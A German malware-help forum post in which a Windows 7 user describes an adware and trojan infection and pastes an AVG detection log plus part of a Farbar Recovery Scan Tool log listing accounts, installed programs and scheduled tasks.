|
Log-Analyse und Auswertung: Malware-gen, Adware-gen ...uswWindows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML. |
20.09.2015, 19:10 | #1 |
| Malware-gen, Adware-gen ...usw Guten Abend zusammen Ich habe gestern versucht Software runterzuladen und bin dabei anscheinend voll in die Kuhscheiße getretten. Mein Computer läuft soweit stabil... naja er kommt mir schon seit einigen Wochen etwas langsamer vor und noch schlimmer ist es noch nicht geworden. AVG erkennt die ganze zeit 20 verschiedene Trojaner Malware usw ... Nachdem ich mabam durchlaufen lassen habe, war auch keine besserung in sicht AVG erkennt wieder 20 verschiedene sachen und Blockt sie erfolgreich...für einige Zeit. Ich bedanke mich jetzt schonmal für eure Hilfe. AVG log Code:
ATTFilter Residenter Schutz Erkennung Name der Bedrohung Adware: Generic6.BRNO, c:\Program Files (x86)\ospd_us_013010091\onesoftperday_widget.exe Adware: Generic6.CEQU, c:\Program Files (x86)\DNS Keeper\ConsoleApplication1.dll Adware: Generic6.CFSR, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RQMWWTX9\prepreinstaller_win[2].exe Adware: Generic6.CFSR, c:\Users\Kenny G\AppData\Local\Temp\nss6DC2.tmp Adware: Generic6.CFSR, c:\Users\Kenny G\AppData\Local\Temp\nss6DC2.tmp Adware: Generic6.CFSR, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RQMWWTX9\prepreinstaller_win[1].exe Adware: Generic6.CFSR, c:\Users\Kenny G\AppData\Local\Temp\nshE782.tmp Adware: Generic6.CFSR, c:\Users\Kenny G\AppData\Local\Temp\nshE782.tmp Adware: Generic6.CGID, c:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\rnsl19B4.exe Adware: Generic6.CGIE, c:\Windows\Temp\7014.tmp.exe Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nss73A.tmp Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nss73A.tmp Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\AnyProtectSetup[1].exe Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nsxB85F.tmp Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nsxB85F.tmp Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nsxB473.tmp Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nsnFFBA.tmp Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nsnFFBA.tmp Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\AnyProtectSetup[1].exe Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WTXQ07VN\AnyProtectSetup[1].exe Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Temp\nsxB473.tmp Adware: Generic6.YLB, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\AnyProtectSetup[1].exe Adware: Generic_r.YY, c:\Users\Kenny G\AppData\Local\Temp\nsn2472.tmp Adware: Generic_r.YY, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\Setup[1].exe Adware: Generic_r.YY, c:\Users\Kenny G\AppData\Local\Temp\nsn2472.tmp Adware: InstallCore.ALX, c:\Users\Kenny G\AppData\Local\Temp\nsnCA65.tmp Adware: InstallCore.ALX, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JSGHNXR8\Setup[1].exe Adware: InstallCore.ALX, c:\Users\Kenny G\AppData\Local\Temp\nsnCA65.tmp Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsn95FA.tmp Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JSGHNXR8\VuuPC_VO2_8907[1].exe Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsn95FA.tmp Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsm5BD2.tmp Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsx51F9.tmp Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsx51F9.tmp Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\VuuPC_VO2_8907[1].exe Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\VuuPC_VO2_8907[1].exe Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\VuuPC_VO2_8907[2].exe Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsm5BD2.tmp Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsxABEB.tmp Eventuell Adware: MultiBundle, c:\Users\Kenny G\AppData\Local\Temp\nsxABEB.tmp Luhe.Fiha.A gefunden, c:\Users\Kenny G\Desktop\Native Instruments Traktor Pro 2.7.3 + Crack\Crack\NI_Traktor_Patch.exe Luhe.Fiha.A gefunden, c:\Users\Kenny G\Desktop\NI_Traktor_Patch.exe MalSign.Generic.445 gefunden, c:\Program Files (x86)\ospd_us_013010091\ospd_us_013010091.exe MalSign.Generic.445 gefunden, c:\Users\Kenny G\AppData\Local\ospd_us_013010091\upospd_us_013010091.exe MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\SmartWebInstaller[1].exe MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsh612E.tmp MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RQMWWTX9\SmartWebInstaller[1].exe MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nshAA44.tmp MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsh612E.tmp MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WTXQ07VN\SmartWebInstaller[1].exe MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsr4F24.tmp MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsmE7AB.tmp MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsmE7AB.tmp MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nshAA44.tmp MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsr4F24.tmp MalSign.Generic.5CE gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JSGHNXR8\SmartWebInstaller[1].exe MalSign.Generic.6E7 gefunden, c:\Users\Kenny G\AppData\Roaming\RPEng\1ACA2586F62B4C6889A51621D81FE007\setup.exe MalSign.Generic.754 gefunden, c:\Program Files (x86)\Max Driver Updater\updater\extract\7z.exe MalSign.Generic.754 gefunden, c:\Program Files (x86)\Max Driver Updater\unins000.exe MalSign.Generic.754 gefunden, c:\Program Files (x86)\Max Driver Updater\updater\extract\7z.dll MalSign.Generic.754 gefunden, c:\Program Files (x86)\MaxDrivrUpdater\Maxdriverupdater.exe MalSign.Generic.754 gefunden, c:\Program Files (x86)\Max Driver Updater\isxdl.dll MalSign.Generic.754 gefunden, c:\Program Files (x86)\MaxDrivrUpdater\Maxdriverupdater.exe MalSign.Generic.754 gefunden, c:\Program Files (x86)\Max Driver Updater\updater\amd64Helper\DriverUpdateHelper64.exe MalSign.Generic.90F gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsr52B3.tmp\setupfa_4435.exe MalSign.Generic.90F gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsr52B3.tmp\setupfa_4435.exe MalSign.Generic.90F gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\setupfa_4435[1].exe MalSign.Generic.978 gefunden, c:\Users\Kenny G\AppData\Local\Temp\jydzpQC7.exe.part MalSign.Generic.978 gefunden, c:\Users\Kenny G\AppData\Local\Temp\QOSrDpYn.exe.part MalSign.Generic.978 gefunden, c:\Users\Kenny G\AppData\Local\Temp\QV3B4s4W.exe.part MalSign.Generic.DBC gefunden, c:\Users\Kenny G\AppData\Local\Temp\LwsT9tew.exe.part MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nscBC7F.tmp MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JSGHNXR8\setup_gmsd_de[1].exe MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WTXQ07VN\setup_gmsd_de[1].exe MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nscDDF.tmp MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsdEA29.tmp MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nshA34A.tmp MalSign.Generic.EC7 gefunden, c:\Program Files (x86)\ospd_us_013010091\predm.exe MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JSGHNXR8\setup_gmsd_de[1].exe MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsdEA29.tmp MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nshA34A.tmp MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\ospd_us_013010091\Download\myoffergroup_de.exe MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\is-3JNUP.tmp\gentlemjmp_ieu.exe MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WTXQ07VN\setup_gmsd_de[1].exe MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nscBC7F.tmp MalSign.Generic.EC7 gefunden, c:\Users\Kenny G\AppData\Local\Temp\nscDDF.tmp Potenziell unerwünschte Anwendung: Downloader.FGJ, c:\Users\Kenny G\AppData\Local\Temp\nskE265.tmp\frghw.dll Potenziell unerwünschte Anwendung: Downloader.FGJ, c:\Users\Kenny G\AppData\Local\Temp\RarSFX0\Auto KMS Remover 1.37.exe Potenziell unerwünschte Anwendung: Downloader.TMZ, c:\Program Files (x86)\DNS Keeper\dnsridgewood.exe Potenziell unerwünschte Anwendung: Downloader.VND, c:\Users\Kenny G\AppData\Local\Temp\UBp9D69.exe Trojaner: Adload_r.BBG, c:\Users\Kenny G\AppData\Local\Temp\oo2.exe Win32/DH{gRJlfRMDICIlV04} gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM02LISM\installer[1].exe Win32/DH{gRJlfRMDICIlV04} gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsm41DB.tmp Win32/DH{gRJlfRMDICIlV04} gefunden, c:\Users\Kenny G\AppData\Local\Temp\nss82D7.tmp Win32/DH{gRJlfRMDICIlV04} gefunden, c:\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RQMWWTX9\setup[1].exe Win32/DH{gRJlfRMDICIlV04} gefunden, c:\Users\Kenny G\AppData\Local\Temp\nsm41DB.tmp Win32/DH{gRJlfRMDICIlV04} gefunden, c:\Users\Kenny G\AppData\Local\Temp\nss82D7.tmp Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:15-09-2015 durchgeführt von Kenny G (2015-09-20 19:35:12) Gestartet von C:\Users\Kenny G\Downloads Windows 7 Ultimate (X64) (2013-10-01 16:18:55) Start-Modus: Normal ========================================================== ==================== Konten: ============================= Administrator (S-1-5-21-682121585-3582832733-1082443493-500 - Administrator - Disabled) eLoot (S-1-5-21-682121585-3582832733-1082443493-1008 - Administrator - Enabled) => C:\Users\eLoot Gast (S-1-5-21-682121585-3582832733-1082443493-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-682121585-3582832733-1082443493-1002 - Limited - Enabled) Kenny G (S-1-5-21-682121585-3582832733-1082443493-1000 - Administrator - Enabled) => C:\Users\Kenny G Tabea Studium (S-1-5-21-682121585-3582832733-1082443493-1009 - Limited - Enabled) => C:\Users\Tabea Studium UpdatusUser (S-1-5-21-682121585-3582832733-1082443493-1007 - Limited - Enabled) => C:\Users\UpdatusUser ==================== Sicherheits-Center ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) ==================== Installierte Programme ====================== (Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.) 888poker (HKLM-x32\...\888poker) (Version: - ) aborange Crypter - Deinstallation (HKLM-x32\...\aborange Crypter_is1) (Version: 3.10 - Mathias Gerlach [aborange.de]) Adobe Flash Player 18 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Reader XI (11.0.12) - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated) Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{2EF5D87E-B7BD-458F-8428-E4D0B8B4E65C}) (Version: 7.0.0.117 - Apple Inc.) Auslogics DiskDefrag (HKLM-x32\...\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1) (Version: 4.4.2.0 - Auslogics Labs Pty Ltd) AVG 2015 (HKLM\...\AVG) (Version: 2015.0.6140 - AVG Technologies) AVG 2015 (Version: 15.0.4419 - AVG Technologies) Hidden AVG 2015 (Version: 15.0.6140 - AVG Technologies) Hidden AVG Web TuneUp (HKLM-x32\...\AVG Web TuneUp) (Version: 4.1.6.294 - AVG Technologies) Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) Battlefield: Bad Company 2 (HKLM-x32\...\Steam App 24960) (Version: - DICE) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) CCleaner (HKLM\...\CCleaner) (Version: 4.06 - Piriform) CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.5.5571 - CDBurnerXP) Cliqz (HKLM-x32\...\{5A0C0737-6AFE-4DC6-A8B4-6DFE509ACD75}_is1) (Version: 0.5.31 - Cliqz.com) Counter-Strike (HKLM-x32\...\Steam App 10) (Version: - Valve) Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version: - Valve) CyberGhost 5 (HKLM\...\CyberGhost 5_is1) (Version: - CyberGhost S.R.L.) DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd) Free Alarm Clock 3.1.0 (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 3.1 - Comfort Software Group) Free YouTube Download version 3.2.61.805 (HKLM-x32\...\Free YouTube Download_is1) (Version: 3.2.61.805 - DVDVideoSoft Ltd.) Free YouTube to MP3 Converter version 3.12.61.805 (HKLM-x32\...\Free YouTube to MP3 Converter_is1) (Version: 3.12.61.805 - DVDVideoSoft Ltd.) GIMP 2.8.10 (HKLM\...\GIMP-2_is1) (Version: 2.8.10 - The GIMP Team) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.93 - Google Inc.) Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment) ICQ 8.2 (build 6901) (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\ICQ) (Version: 8.2.6901.0 - ICQ) iTunes (HKLM\...\{A535111D-95C8-487F-869E-CE4C239972D2}) (Version: 11.1.1.11 - Apple Inc.) Java 7 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.450 - Oracle) JetBoost (HKLM-x32\...\JetBoost_is1) (Version: 2.0.0 - BlueSprig) League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games ) League of Legends (x32 Version: 3.0.1 - Riot Games ) Hidden LibreOffice 4.2.2.1 (HKLM-x32\...\{0ECDB550-79ED-4E9E-851B-19A8B2B4EBFA}) (Version: 4.2.2.1 - The Document Foundation) Malwarebytes Anti-Malware Version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation) Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation) Mozilla Firefox 40.0.3 (x86 de) (HKLM-x32\...\Mozilla Firefox 40.0.3 (x86 de)) (Version: 40.0.3 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 40.0.3.5716 - Mozilla) Mozilla Thunderbird 24.6.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 24.6.0 (x86 de)) (Version: 24.6.0 - Mozilla) Native Instruments Audio 2 DJ Driver (HKLM-x32\...\Native Instruments Audio 2 DJ Driver) (Version: - Native Instruments) Native Instruments Audio 4 DJ Driver (HKLM-x32\...\Native Instruments Audio 4 DJ Driver) (Version: - Native Instruments) Native Instruments Audio 8 DJ Driver (HKLM-x32\...\Native Instruments Audio 8 DJ Driver) (Version: - Native Instruments) Native Instruments Controller Editor (HKLM-x32\...\Native Instruments Controller Editor) (Version: 1.8.2.281 - Native Instruments) Native Instruments Service Center (HKLM-x32\...\Native Instruments Service Center) (Version: 2.6.0.137 - Native Instruments) Native Instruments Traktor (HKLM-x32\...\Native Instruments Traktor) (Version: - Native Instruments) Native Instruments Traktor 2 (HKLM-x32\...\Native Instruments Traktor 2) (Version: 2.9.0.1257 - Native Instruments) Native Instruments Traktor Audio 2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 Driver) (Version: - Native Instruments) Native Instruments Traktor Audio 2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Audio 6 Driver (HKLM-x32\...\Native Instruments Traktor Audio 6 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol D2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol D2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol F1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol F1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S4 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S4 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S8 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S8 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol X1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol X1 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol Z1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol Z2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z2 Driver) (Version: - Native Instruments) NVIDIA 3D Vision Controller-Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 331.65 - NVIDIA Corporation) NVIDIA 3D Vision Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 331.65 - NVIDIA Corporation) NVIDIA Grafiktreiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 331.65 - NVIDIA Corporation) NVIDIA PhysX-Systemsoftware 9.13.0725 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.0725 - NVIDIA Corporation) NVIDIA Virtual Audio 1.2.9 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_VirtualAudio.Driver) (Version: 1.2.9 - NVIDIA Corporation) Opera Stable 32.0.1948.25 (HKLM-x32\...\Opera 32.0.1948.25) (Version: 32.0.1948.25 - Opera Software) Pidgin (HKLM-x32\...\Pidgin) (Version: 2.10.7 - ) pidgin-otr 4.0.0-1 (HKLM-x32\...\pidgin-otr) (Version: 4.0.0-1 - Cypherpunks CA) Poker 770 (HKLM-x32\...\Poker 770) (Version: - ) PokerStars.eu (HKLM-x32\...\PokerStars.eu) (Version: - PokerStars.eu) Project 64 version 2.1.0.1 (HKLM-x32\...\Project 64_is1) (Version: 2.1.0.1 - ) SHIELD Streaming (Version: 1.6.34 - NVIDIA Corporation) Hidden Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.) SleepTimer Ultimate 1.2 (HKLM-x32\...\{0EE56463-49B2-45E1-B74F-3E0139DBC986}_is1) (Version: - Christian Handorf) Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.13.13.201311261136 - Sony Mobile Communications AB) Sony PC Companion 2.10.188 (HKLM-x32\...\{F09EF8F2-0976-42C1-8D9D-8DF78337C6E3}) (Version: 2.10.188 - Sony) Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation) TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - ) TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH) TrackMania United (HKLM-x32\...\Steam App 7200) (Version: - Nadeo) Trojan Remover 6.9.3 (HKLM-x32\...\Trojan Remover_is1) (Version: 6.9.3 - Simply Super Software) TrueCrypt (HKLM-x32\...\TrueCrypt) (Version: 7.1a - TrueCrypt Foundation) Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies) Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.) VLC media player 2.1.0 (HKLM-x32\...\VLC media player) (Version: 2.1.0 - VideoLAN) VNC Viewer 5.1.0 (HKLM\...\{8F29CFF4-4A54-4C34-8905-B74527DE93C8}) (Version: 5.1.0 - RealVNC Ltd) Web Companion (HKLM-x32\...\{99640eec-4d74-4df5-95f4-719dc27de6a8}) (Version: 2.0.1025.2130 - Lavasoft) Webocton - Scriptly 0.8.95.6 (HKLM-x32\...\Webocton - Scriptly_is1) (Version: 0.8.95.6 - Webocton) William Hill Poker (HKLM-x32\...\William Hill Poker) (Version: - ) WinRAR 5.01 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH) World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment) Wuala (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Wuala) (Version: 1.0.444.0 - LaCie) Wuala CBFS (HKLM-x32\...\Wuala CBFS) (Version: 3.2.107.0 - LaCie) Wuala OverlayIcons (HKLM-x32\...\Wuala OverlayIcons) (Version: 1.0.0.2 - LaCie) Xilisoft iPhone Magic (HKLM-x32\...\Xilisoft iPhone Magic) (Version: 5.7.5.20150727 - Xilisoft) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Wiederherstellungspunkte ========================= Wiederherstellungspunkte konnten nicht aufgelistet werden Überprüfen Sie den "winmgmt" Dienst oder reparieren Sie den WMI. ==================== Hosts Inhalt: =============================== (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 2009-07-14 04:34 - 2009-06-10 23:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) Task: {0D1A705F-BC57-4C56-9001-41F179ED8A24} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-09-19] (Piriform Ltd) Task: {2C62D752-B42F-4EBB-9A9B-8F3648694368} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe [2015-08-13] 